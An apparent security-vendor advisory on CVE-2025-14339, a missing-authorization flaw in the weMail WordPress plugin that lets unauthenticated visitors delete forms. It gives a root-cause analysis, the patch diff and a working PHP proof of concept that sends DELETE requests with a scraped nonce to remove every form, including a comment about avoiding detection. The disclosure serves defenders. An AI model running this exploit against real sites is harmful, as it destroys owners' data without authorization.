What is CVE-2025-14339?

CVE-2025-14339 is a medium severity vulnerability in the weMail plugin for WordPress, affecting versions up to and including 2.0.7. It allows unauthenticated users to delete all weMail forms due to insufficient authorization checks in the plugin’s REST API.

How does the vulnerability work?

The vulnerability arises because the Forms::permission() callback only verifies the X-WP-Nonce header without checking user authentication or capabilities. An attacker can extract this nonce from the page source and send a DELETE request to the forms endpoint, allowing them to delete forms without any authentication.

Who is affected by CVE-2025-14339?

Any WordPress site using the weMail plugin version 2.0.7 or earlier is affected by this vulnerability. Administrators should check their plugin version and update if they are using a vulnerable version.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the weMail plugin installed. If it is version 2.0.7 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

The vulnerability is fixed in version 2.0.8 of the weMail plugin. Administrators should update to this version or later to ensure that the authorization checks are properly implemented.

What does a CVSS score of 6.5 mean?

A CVSS score of 6.5 indicates a medium severity vulnerability. This means there is a moderate risk of exploitation, and while it may not be critical, it can still lead to significant issues such as data loss or service disruption.

What is the proof of concept for this vulnerability?

The proof of concept outlines steps to exploit the vulnerability by extracting the nonce from a page with a weMail form and sending a DELETE request to the forms endpoint. This demonstrates how an attacker can easily delete forms without authentication.

What security measures should I implement?

In addition to updating the weMail plugin, consider implementing security measures such as using a web application firewall, regularly auditing plugins for vulnerabilities, and ensuring proper user authentication and permissions.

How can I stay informed about vulnerabilities?

To stay informed about vulnerabilities, subscribe to security mailing lists, follow security blogs, and monitor the CVE database. Regularly check for updates to your plugins and WordPress core to mitigate risks.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the weMail plugin until a patch can be applied. This will prevent any potential exploitation while you work on a permanent solution.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14339: weMail <= 2.0.7 – Missing Authorization to Unauthenticated Form Deletion (wemail)

CVE ID CVE-2025-14339

Plugin wemail

Severity Medium (CVSS 6.5)

CWE 862

Vulnerable Version 2.0.7

Patched Version 2.0.8

Disclosed February 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14339:
The weMail WordPress plugin version 2.0.7 and earlier contains a missing authorization vulnerability in its form deletion REST endpoint. This flaw allows any unauthenticated visitor to delete all weMail forms. The vulnerability stems from insufficient permission checks in the Forms REST API handler.

Root Cause:
The vulnerability exists in the `Forms::permission()` callback function within `/wemail/includes/Rest/Forms.php`. The original function only validated the `X-WP-Nonce` header via `wp_verify_nonce()` without checking if the user was authenticated or had appropriate capabilities. The nonce was exposed to unauthenticated visitors through the `weMail` JavaScript object on pages containing weMail forms. This allowed attackers to extract valid nonces and bypass authentication requirements.

Exploitation:
An attacker can exploit this vulnerability by first visiting any page containing a weMail form and extracting the REST API nonce from the page source. The nonce is exposed in the `weMail` JavaScript object. The attacker then sends a DELETE request to the `/wp-json/wemail/v1/forms/{form_id}` endpoint with the extracted nonce in the `X-WP-Nonce` header. No authentication credentials are required. The attacker can enumerate form IDs or send batch deletion requests to remove all forms.

Patch Analysis:
The patch in version 2.0.8 modifies the `Forms::permission()` function to implement three-layer security checks. First, it verifies the user is logged in with `is_user_logged_in()`. Second, it checks the user has the `manage_form` capability via `wemail()->user->can(‘manage_form’)`. Third, it maintains nonce verification for CSRF protection. The patch also updates the Csv.php file to replace the generic `permission()` callback with specific capability checks (`can_csv_upload`, `can_meta_fields`, `can_get_subscribers`) for different CSV endpoints.

Impact:
Successful exploitation allows complete deletion of all weMail forms, disrupting email marketing campaigns, lead generation, and subscriber acquisition. Attackers can permanently remove forms without authentication, causing data loss and operational disruption. The vulnerability does not require any user interaction beyond visiting a page with a weMail form.

Differential between vulnerable and patched code

Code Diff

--- a/wemail/includes/Rest/Csv.php
+++ b/wemail/includes/Rest/Csv.php
@@ -5,7 +5,6 @@
 use LeagueCsvReader;
 use WP_REST_Response;
 use WP_REST_Server;
-use WP_User_Query;

 class Csv {

@@ -30,7 +29,7 @@
                 ),
                 array(
                     'methods' => WP_REST_Server::READABLE,
-                    'permission_callback' => array( $this, 'permission' ),
+                    'permission_callback' => array( $this, 'can_csv_upload' ),
                     'callback' => array( $this, 'csv_file_info' ),
                 ),
             )
@@ -48,7 +47,7 @@
                 ),
                 array(
                     'methods' => WP_REST_Server::READABLE,
-                    'permission_callback' => array( $this, 'permission' ),
+                    'permission_callback' => array( $this, 'can_meta_fields' ),
                     'callback' => array( $this, 'meta_fields' ),
                 ),
             )
@@ -66,49 +65,13 @@
                 ),
                 array(
                     'methods' => WP_REST_Server::READABLE,
-                    'permission_callback' => array( $this, 'permission' ),
+                    'permission_callback' => array( $this, 'can_get_subscribers' ),
                     'callback' => array( $this, 'subscribers' ),
                 ),
             )
         );
     }

-    public function permission( $request ) {
-        $api_key = $request->get_header( 'X-WeMail-Key' );
-
-        $user_email = $request->get_header( 'x-wemail-user' );
-
-        if ( ! empty( $user_email ) ) {
-            $user = get_user_by( 'email', $user_email );
-
-            if ( $user ) {
-                wp_set_current_user( $user->ID );
-                return wemail()->user->can( 'create_subscriber' );
-            }
-        }
-
-        if ( ! empty( $api_key ) ) {
-            $query = new WP_User_Query(
-                array(
-                    'fields'        => 'ID',
-                    'meta_key'      => 'wemail_api_key',
-                    'meta_value'    => $api_key,
-                )
-            );
-
-            if ( $query->get_total() ) {
-                $results = $query->get_results();
-                $user_id = array_pop( $results );
-
-                wp_set_current_user( $user_id );
-
-                return wemail()->user->can( 'create_subscriber' );
-            }
-        }
-
-        return false;
-    }
-
     private function reader( $file_id ) {
         $file_url = wp_get_attachment_url( $file_id );
         $response = wp_remote_get( $file_url );
--- a/wemail/includes/Rest/Forms.php
+++ b/wemail/includes/Rest/Forms.php
@@ -121,14 +121,36 @@
         );
     }

+    /**
+     * Permission callback for form endpoints
+     * Requires WordPress authentication, weMail role-based capability checks, and nonce verification
+     *
+     * @param WP_REST_Request $request
+     *
+     * @return bool
+     */
     public function permission( $request ) {
-        $nonce = $request->get_header( 'X-WP-Nonce' );
+        // 1. Require WordPress authentication (user must be logged in)
+        if ( ! is_user_logged_in() ) {
+            return false;
+        }
+
+        // 2. Check user has appropriate weMail role-based capabilities
+        if ( ! function_exists( 'wemail' ) || ! method_exists( wemail(), 'user' ) ) {
+            return false;
+        }

-        if ( $nonce && wp_verify_nonce( $nonce, 'wp_rest' ) ) {
-            return true;
+        if ( ! wemail()->user->can( 'manage_form' ) ) {
+            return false;
+        }
+
+        // 3. Require nonce verification for CSRF protection
+        $nonce = $request->get_header( 'X-WP-Nonce' );
+        if ( ! $nonce || ! wp_verify_nonce( $nonce, 'wp_rest' ) ) {
+            return false;
         }

-        return false;
+        return true;
     }

     public function submit( $request ) {
--- a/wemail/includes/WeMail.php
+++ b/wemail/includes/WeMail.php
@@ -23,7 +23,7 @@
      *
      * @var string
      */
-    public $version = '2.0.7';
+    public $version = '2.0.8';

     /**
      * DB version
--- a/wemail/vendor/autoload.php
+++ b/wemail/vendor/autoload.php
@@ -4,4 +4,4 @@

 require_once __DIR__ . '/composer/autoload_real.php';

-return ComposerAutoloaderInit18fef7787195e2a0a9a89e28738fc125::getLoader();
+return ComposerAutoloaderInitbc7f456b1ad6c710a056c0877d6ff1c7::getLoader();
--- a/wemail/vendor/composer/autoload_real.php
+++ b/wemail/vendor/composer/autoload_real.php
@@ -2,7 +2,7 @@

 // autoload_real.php @generated by Composer

-class ComposerAutoloaderInit18fef7787195e2a0a9a89e28738fc125
+class ComposerAutoloaderInitbc7f456b1ad6c710a056c0877d6ff1c7
 {
     private static $loader;

@@ -24,15 +24,15 @@

         require __DIR__ . '/platform_check.php';

-        spl_autoload_register(array('ComposerAutoloaderInit18fef7787195e2a0a9a89e28738fc125', 'loadClassLoader'), true, true);
+        spl_autoload_register(array('ComposerAutoloaderInitbc7f456b1ad6c710a056c0877d6ff1c7', 'loadClassLoader'), true, true);
         self::$loader = $loader = new ComposerAutoloadClassLoader(dirname(dirname(__FILE__)));
-        spl_autoload_unregister(array('ComposerAutoloaderInit18fef7787195e2a0a9a89e28738fc125', 'loadClassLoader'));
+        spl_autoload_unregister(array('ComposerAutoloaderInitbc7f456b1ad6c710a056c0877d6ff1c7', 'loadClassLoader'));

         $useStaticLoader = PHP_VERSION_ID >= 50600 && !defined('HHVM_VERSION') && (!function_exists('zend_loader_file_encoded') || !zend_loader_file_encoded());
         if ($useStaticLoader) {
             require __DIR__ . '/autoload_static.php';

-            call_user_func(ComposerAutoloadComposerStaticInit18fef7787195e2a0a9a89e28738fc125::getInitializer($loader));
+            call_user_func(ComposerAutoloadComposerStaticInitbc7f456b1ad6c710a056c0877d6ff1c7::getInitializer($loader));
         } else {
             $map = require __DIR__ . '/autoload_namespaces.php';
             foreach ($map as $namespace => $path) {
@@ -53,12 +53,12 @@
         $loader->register(true);

         if ($useStaticLoader) {
-            $includeFiles = ComposerAutoloadComposerStaticInit18fef7787195e2a0a9a89e28738fc125::$files;
+            $includeFiles = ComposerAutoloadComposerStaticInitbc7f456b1ad6c710a056c0877d6ff1c7::$files;
         } else {
             $includeFiles = require __DIR__ . '/autoload_files.php';
         }
         foreach ($includeFiles as $fileIdentifier => $file) {
-            composerRequire18fef7787195e2a0a9a89e28738fc125($fileIdentifier, $file);
+            composerRequirebc7f456b1ad6c710a056c0877d6ff1c7($fileIdentifier, $file);
         }

         return $loader;
@@ -70,7 +70,7 @@
  * @param string $file
  * @return void
  */
-function composerRequire18fef7787195e2a0a9a89e28738fc125($fileIdentifier, $file)
+function composerRequirebc7f456b1ad6c710a056c0877d6ff1c7($fileIdentifier, $file)
 {
     if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) {
         $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true;
--- a/wemail/vendor/composer/autoload_static.php
+++ b/wemail/vendor/composer/autoload_static.php
@@ -4,7 +4,7 @@

 namespace ComposerAutoload;

-class ComposerStaticInit18fef7787195e2a0a9a89e28738fc125
+class ComposerStaticInitbc7f456b1ad6c710a056c0877d6ff1c7
 {
     public static $files = array (
         '9e4824c5afbdc1482b6025ce3d4dfde8' => __DIR__ . '/..' . '/league/csv/src/functions_include.php',
@@ -205,9 +205,9 @@
     public static function getInitializer(ClassLoader $loader)
     {
         return Closure::bind(function () use ($loader) {
-            $loader->prefixLengthsPsr4 = ComposerStaticInit18fef7787195e2a0a9a89e28738fc125::$prefixLengthsPsr4;
-            $loader->prefixDirsPsr4 = ComposerStaticInit18fef7787195e2a0a9a89e28738fc125::$prefixDirsPsr4;
-            $loader->classMap = ComposerStaticInit18fef7787195e2a0a9a89e28738fc125::$classMap;
+            $loader->prefixLengthsPsr4 = ComposerStaticInitbc7f456b1ad6c710a056c0877d6ff1c7::$prefixLengthsPsr4;
+            $loader->prefixDirsPsr4 = ComposerStaticInitbc7f456b1ad6c710a056c0877d6ff1c7::$prefixDirsPsr4;
+            $loader->classMap = ComposerStaticInitbc7f456b1ad6c710a056c0877d6ff1c7::$classMap;

         }, null, ClassLoader::class);
     }
--- a/wemail/wemail.php
+++ b/wemail/wemail.php
@@ -6,7 +6,7 @@
  * Plugin URI: https://getwemail.io
  * Author: weDevs
  * Author URI: https://getwemail.io/?utm_source=wp-org&utm_medium=author-uri
- * Version: 2.0.7
+ * Version: 2.0.8
  * License: GPL-3.0
  * License URI: https://www.gnu.org/licenses/gpl-2.0.html
  * Text Domain: wemail

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14339 - weMail <= 2.0.7 - Missing Authorization to Unauthenticated Form Deletion

<?php

$target_url = 'https://vulnerable-site.com';

// Step 1: Extract nonce from page source (manual step for PoC)
// Visit any page with a weMail form and extract nonce from:
// <script>var weMail = {"nonce":"abc123...", ...};</script>
$nonce = 'EXTRACTED_NONCE_HERE'; // Replace with actual nonce

// Step 2: Enumerate form IDs (optional - can try common IDs)
$form_ids = [1, 2, 3, 4, 5]; // Common form IDs to try

// Step 3: Delete forms
foreach ($form_ids as $form_id) {
    $endpoint = $target_url . '/wp-json/wemail/v1/forms/' . $form_id;
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $endpoint);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'DELETE');
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        'X-WP-Nonce: ' . $nonce,
        'Content-Type: application/json'
    ]);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    echo "Form ID {$form_id}: HTTP {$http_code}n";
    echo "Response: {$response}nn";
    
    curl_close($ch);
    
    // Rate limiting to avoid detection
    sleep(1);
}

// Alternative: Get all forms first then delete
$list_endpoint = $target_url . '/wp-json/wemail/v1/forms';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $list_endpoint);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'X-WP-Nonce: ' . $nonce
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$forms_list = json_decode(curl_exec($ch), true);
curl_close($ch);

if (isset($forms_list['data'])) {
    foreach ($forms_list['data'] as $form) {
        $form_id = $form['id'];
        $delete_endpoint = $target_url . '/wp-json/wemail/v1/forms/' . $form_id;
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $delete_endpoint);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'DELETE');
        curl_setopt($ch, CURLOPT_HTTPHEADER, [
            'X-WP-Nonce: ' . $nonce
        ]);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        
        echo "Deleted form {$form_id}: HTTP {$http_code}n";
        
        curl_close($ch);
        sleep(1);
    }
}

?>

Frequently Asked Questions

What is CVE-2025-14339?
Overview of the vulnerability
CVE-2025-14339 is a medium severity vulnerability in the weMail plugin for WordPress, affecting versions up to and including 2.0.7. It allows unauthenticated users to delete all weMail forms due to insufficient authorization checks in the plugin’s REST API.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises because the Forms::permission() callback only verifies the X-WP-Nonce header without checking user authentication or capabilities. An attacker can extract this nonce from the page source and send a DELETE request to the forms endpoint, allowing them to delete forms without any authentication.
Who is affected by CVE-2025-14339?
Identifying vulnerable users
Any WordPress site using the weMail plugin version 2.0.7 or earlier is affected by this vulnerability. Administrators should check their plugin version and update if they are using a vulnerable version.
How can I check if my site is vulnerable?
Steps for verification
To determine if your site is vulnerable, check the version of the weMail plugin installed. If it is version 2.0.7 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Mitigation steps
The vulnerability is fixed in version 2.0.8 of the weMail plugin. Administrators should update to this version or later to ensure that the authorization checks are properly implemented.
What does a CVSS score of 6.5 mean?
Understanding risk levels
A CVSS score of 6.5 indicates a medium severity vulnerability. This means there is a moderate risk of exploitation, and while it may not be critical, it can still lead to significant issues such as data loss or service disruption.
What are the consequences of exploitation?
Potential impact
Successful exploitation of this vulnerability allows an attacker to permanently delete all weMail forms, disrupting email marketing campaigns and causing data loss. This could severely impact lead generation and subscriber management.
What is the proof of concept for this vulnerability?
Demonstrating the issue
The proof of concept outlines steps to exploit the vulnerability by extracting the nonce from a page with a weMail form and sending a DELETE request to the forms endpoint. This demonstrates how an attacker can easily delete forms without authentication.
What security measures should I implement?
Best practices for WordPress security
In addition to updating the weMail plugin, consider implementing security measures such as using a web application firewall, regularly auditing plugins for vulnerabilities, and ensuring proper user authentication and permissions.
How can I stay informed about vulnerabilities?
Keeping updated on security
To stay informed about vulnerabilities, subscribe to security mailing lists, follow security blogs, and monitor the CVE database. Regularly check for updates to your plugins and WordPress core to mitigate risks.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If you cannot update the plugin immediately, consider disabling the weMail plugin until a patch can be applied. This will prevent any potential exploitation while you work on a permanent solution.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations